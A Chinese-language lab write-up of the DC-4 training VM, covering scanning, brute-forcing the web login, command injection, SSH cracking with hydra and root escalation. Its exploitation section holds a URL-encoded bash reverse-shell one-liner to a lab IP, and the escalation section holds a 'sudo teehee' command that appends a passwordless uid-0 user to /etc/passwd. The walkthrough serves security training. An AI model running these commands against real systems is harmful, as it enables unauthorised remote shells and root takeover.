小H靶场笔记:DC-4

DC-4

January 4, 2024 2:37 PM
Tags: teehee提权
Owner:只惠摸鱼

信息收集

  • 探测靶机ip,发现应该是192.168.199.134

  • 扫一下开放端口(22、80)、服务、版本、漏洞

  • 根据扫描结果,在80端口可能有CSRF漏洞,可以尝试利用一下

    • OS为Linux3.2-4.9
  • 80端口开放,那先扫一下目录吧,发现没有什么

    小H靶场笔记:DC-4_第1张图片

漏洞利用

  • 那就看一下80端口吧,打开页面瞅一眼,很简洁,没有什么提示,尝试登录也是直接重定向了。

小H靶场笔记:DC-4_第2张图片

  • 那就BP抓包看一下吧,发现是POST请求,请求体有usernamepassword,请求头有cookie,尝试随即登录且不发送改变。

小H靶场笔记:DC-4_第3张图片

  • 尝试了万能密码没有效果,试一下爆破吧,盲猜账号为admin

    小H靶场笔记:DC-4_第4张图片

    • 我使用了我自己的收集的一个常用字典大概7.5k
    • 字典越好爆破的越快,(我设置了线程为1,防止服务崩溃【别问我怎么知道的】)
  • 爆破出了密码happy

    小H靶场笔记:DC-4_第5张图片

  • 使用admin,和happy登录,进入到页面

    小H靶场笔记:DC-4_第6张图片

  • 点击command,发现可以执行一些系统命令,抓包试试看

    小H靶场笔记:DC-4_第7张图片

  • 修改radio参数,发现可以成功执行系统命令

    小H靶场笔记:DC-4_第8张图片

  • 反弹shell给kali,方便做下一步提权操作

    • kali:nc -lvp 1234
    • 被控端:bash±c+'bash±i+>%26+/dev/tcp/192.168.199.129/1234+0>%261’
    • %26为&的url编码,不转码会和‘&’符号冲突。

    小H靶场笔记:DC-4_第9张图片

    小H靶场笔记:DC-4_第10张图片

  • 用户为普通用户,权限太低,查看目录,翻到home目录,发现有三个用户

    小H靶场笔记:DC-4_第11张图片

    • /home 在Linux中代表用户主目录

      在这里插入图片描述

      • 对一般用户,~表示/home/(用户名)
      • 对于root用户,~表示/root
  • 翻看用户目录,发现jim目录中有一个backups目录,且其中有一个密码字典

    小H靶场笔记:DC-4_第12张图片

  • 将字典复制到本地txt,直接尝试使用hydra爆破jim用户 ssh服务

    • Hydra是一款密码破解工具,可以用来破解各种网络应用程序的登录口令。 Hydra支持多种协议和服务,如FTP、SSH、Telnet、SMTP、POP3、IMAP、HTTP、LDAP、SMB等,可以使用字典攻击、暴力破解等方式进行密码破解

    小H靶场笔记:DC-4_第13张图片

  • 得到密码

    小H靶场笔记:DC-4_第14张图片

  • 登录ssh

    小H靶场笔记:DC-4_第15张图片

  • 尝试sudo -l 发现没有权限,权限太低,需要寻找其他用户

    小H靶场笔记:DC-4_第16张图片

  • 查看文件 发现有邮件,可以查看一下邮箱试试

    小H靶场笔记:DC-4_第17张图片

    • 邮件存储位置可以因系统而异,通常在**/var/spool/mail/var/mail**目录中
  • 查看邮箱中的邮件,发现charles的密码。

    小H靶场笔记:DC-4_第18张图片

  • 通过所给的密码尝试切换用户

    在这里插入图片描述

提权

  • sudo -l查看无需密码的指令(类似git提权)

    在这里插入图片描述

  • 发现有teehee,百度了查一下teehee提权方法

    • 输入指令创建raaj用户

      • echo “raaj::0:0:::/bin/bash” | sudo teehee -a /etc/passwd
    • 直接无密码登录raaj用户,得到root权限

      在这里插入图片描述

  • 进入/root目录得到flag!

    小H靶场笔记:DC-4_第19张图片

teehee提权

  • teehee是linux编辑器。在有sudo权限时,可以利用其来提权
  • 核心思路就是利用其在passwd文件中追加一条uid为0的用户条目
    • echo "hwhw::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
  • 按照linux用户机制,如果没有shadow条目,且passwd用户密码条目为空的时候,可以本地直接su空密码登录。所以只需要执行su hwhw就可以登录到hwhw用户,这个用户因为uid为0,所以也是root权限

你可能感兴趣的:(靶场笔记,笔记,网络安全)